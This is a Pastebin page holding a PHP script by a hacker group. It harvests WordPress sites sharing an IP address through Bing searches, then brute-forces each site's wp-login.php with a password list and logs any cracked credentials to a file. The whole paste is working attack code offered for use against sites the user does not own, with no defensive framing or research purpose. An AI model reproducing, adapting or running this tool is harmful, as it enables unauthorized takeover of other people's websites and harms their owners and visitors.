Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- /*
- * Coded By : xSecurity
- * Sec4ever.com
- * Usage : php wp.php 127.0.0.1 admin pass.txt
- */
- @set_time_limit(0);
- if(count($argv)<3)
- {
- print "
- _ _
- ___ ___ ___| || | _____ _____ _ __
- / __|/ _ \/ __| || |_ / _ \ \ / / _ \ '__|
- \__ \ __/ (__|__ _| __/\ V / __/ |
- |___/\___|\___| |_| \___| \_/ \___|_|xSecurity\r\n";
- print "[+] Skype : xSecur1ty\r\n";
- print "[+] Greets : b0x - x00x Team\r\n";
- print "[+] Homepage : www.sec4ever.com\r\n";
- print "[+] Usage : php wp.php 127.0.0.1 admin pass.txt\r\n";
- die();
- }
- ################
- $ip = $argv[1];
- $username = $argv[2];
- $passlist = $argv[3];
- $password = explode("\n", @file_get_contents($passlist));
- $bing = "IP:+{$ip}+page_id=";
- ################
- function check($url)
- {
- $url=(!eregi("http://www",$url))?str_replace("http://","http://www.",$url):$url;
- preg_match("#(.*?)\/[?]page_id=#",$url,$m);
- return $m[1];
- }
- print(" _ _
- __ ___ __ ___(_) |_ ___ ___
- \ \ /\ / / '_ \ / __| | __/ _ \/ __|
- \ V V /| |_) | \__ \ | || __/\__ \
- \_/\_/ | .__/ |___/_|\__\___||___/
- |_| \r\n");
- for($i=1;$i<=10+10;$i++)
- {
- $get = @file_get_contents("http://www.bing.com/search?q={$bing}&go=&qs=ds&filt=all&first=$i");
- preg_match_all('#(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)#siU',$get, $site);
- $sites = array_unique($site[2]);
- }
- $fopen = fopen('xsec-sites.txt','w');
- foreach($sites as $webs)
- {
- $domains = check($webs);
- $do = "{$domains}\r\n";
- $f = fwrite($fopen,$do);
- if($f)
- {
- print "# {$domains} -> Saved ! #\r\n";
- }
- }
- ################## Brute Force ##################
- print(" _ _
- | |__ _ __ _ _| |_ ___
- | '_ \| '__| | | | __/ _ \
- | |_) | | | |_| | || __/
- |_.__/|_| \__,_|\__\___|
- \r\n");
- $xsec_list = "xsec-sites.txt";
- $fopen2 = fopen('cracks.txt','a+');
- $weblist = explode("\n", @file_get_contents($xsec_list));
- foreach($weblist as $web)
- {
- $web = @trim($web);
- print "{$web}/ \r\n";
- foreach($password as $pass)
- {
- $pass = @trim($pass);
- $b0x = b0x($web,$username,$pass);
- if(preg_match('/<div id="screen-meta" class="metabox-prefs">/', $b0x))
- {
- print "Cracked -> {$username} -> {$pass}\r\n";
- $s1 = "{$web} -> User: {$username} -> Pass: {$pass}\r\n";
- fwrite($fopen2,$s1);
- break;
- }
- }
- }
- function b0x($web,$username,$pass)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./b0x.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./b0x.txt");
- curl_setopt($curl,CURLOPT_URL, "{$web}/wp-login.php");
- curl_setopt($curl,CURLOPT_POSTFIELDS, "log={$username}&pwd={$pass}&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1");
- $brute = curl_exec($curl);
- return $brute;
- }
- @system("del b0x.txt");
- @system("rm b0x.txt");
- ?>
Add Comment
Please, Sign In to add comment